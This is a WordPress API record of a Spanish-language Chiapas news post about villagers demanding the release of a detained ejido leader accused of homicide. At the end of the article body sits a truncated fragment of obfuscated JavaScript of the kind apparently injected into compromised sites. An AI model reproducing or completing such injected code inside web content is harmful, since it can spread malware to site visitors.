{"id":7027,"date":"2022-11-28T04:23:25","date_gmt":"2022-11-28T04:23:25","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=7027"},"modified":"2022-11-28T04:23:27","modified_gmt":"2022-11-28T04:23:27","slug":"continuan-exigiendo-la-liberacion-de-lider-motoneto","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=7027","title":{"rendered":"Contin\u00faan exigiendo la liberaci\u00f3n de l\u00edder motoneto"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"615\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/11\/WhatsApp-Image-2022-11-27-at-4.24.36-PM-1-1024x615.jpeg\" alt=\"\" class=\"wp-image-7028\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/11\/WhatsApp-Image-2022-11-27-at-4.24.36-PM-1-1024x615.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/11\/WhatsApp-Image-2022-11-27-at-4.24.36-PM-1-300x180.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/11\/WhatsApp-Image-2022-11-27-at-4.24.36-PM-1-768x461.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/11\/WhatsApp-Image-2022-11-27-at-4.24.36-PM-1.jpeg 1199w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/Corresponsal<\/p>\n\n\n\n<p>San Crist\u00f3bal de Las Casas. &#8211; Pobladores de el Ejido El Pinar anunciaron que m\u00e1s organizaciones se est\u00e1n sumando para demandar la liberaci\u00f3n del dirigente de la Asociaci\u00f3n Rices del Pinar, Pablo P\u00e9rez S\u00e1ntiz, detenido el pasado 28 de octubre del presente a\u00f1o, se\u00f1alado de homicidio calificado, adem\u00e1s de ser l\u00edder del grupo delincuencial denominado Los Motonetas.<\/p>\n\n\n\n<p>\u201cNos han bloqueado la v\u00eda del di\u00e1logo, y en cambio el ayuntamiento municipal, protege e impulsa a personas como Narciso Ruiz, Jer\u00f3nimo Ruiz y Maximiliano alias El Max, l\u00edder de la organizaci\u00f3n Almetrach, para que contin\u00faen interviniendo en asunto que compete en nuestro Ejido, es por eso que anunciamos la incorporaci\u00f3n de m\u00e1s organizaciones del estado de Chiapas al movimiento social para hacernos escuchar, no nos van a oprimir y no nos van a callar\u201d, dijo uno de los voceros.<\/p>\n\n\n\n<p>En conferencia de prensa, pidi\u00f3 a las autoridades competentes acepten las mesas de di\u00e1logo que vienen solicitando, ya que est\u00e1n cansados de los conflictos dentro del Ejido, y con eso se logre la liberaci\u00f3n del dirigente Pablo P\u00e9rez S\u00e1ntiz, ya que es \u201cinocente, fue encarcelado por ser un luchador social en su ejido, \u00e9l solo era mediador\u201d.<\/p>\n\n\n\n<p>\u201cPedimos a las autoridades, para que nos atienda ya que nosotros queremos abonar a la paz y a la gobernabilidad, ya estamos cansados de tanto conflictos dentro de nuestro ejido, es por eso que pedimos de manera urgente, atienda nuestras peticiones\u201d, refiri\u00f3.<\/p>\n\n\n\n<p>En su intervenci\u00f3n, Marcelino L\u00f3pez, Tesorero del Ejido El Pinar, dej\u00f3 en claro que no existen invasiones, ya que la toma de las tierras fue una determinaci\u00f3n en asamblea, incluso con la presencia de las ex autoridades que ahora los se\u00f1alan de invasores.<\/p>\n\n\n\n<p>Pide a las instancias de gobierno, sean llamados a di\u00e1logo pero sin la intervenci\u00f3n de personas que nada tienen que ver en el asunto, ya que solamente han ocasionado la divisi\u00f3n del ejido El Pinar<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/Corresponsal San Crist\u00f3bal de Las Casas. &#8211; Pobladores de el Ejido El Pinar anunciaron que m\u00e1s organizaciones se est\u00e1n sumando para demandar la liberaci\u00f3n del dirigente de la Asociaci\u00f3n Rices del Pinar, Pablo P\u00e9rez S\u00e1ntiz, detenido el pasado 28 de octubre del presente a\u00f1o, se\u00f1alado de homicidio calificado, adem\u00e1s de ser l\u00edder del grupo &hellip;<\/p>\n","protected":false},"author":2,"featured_media":7028,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-7027","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/7027","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=7027"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/7027\/revisions"}],"predecessor-version":[{"id":7029,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/7027\/revisions\/7029"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/7028"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=7027"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=7027"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=7027"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}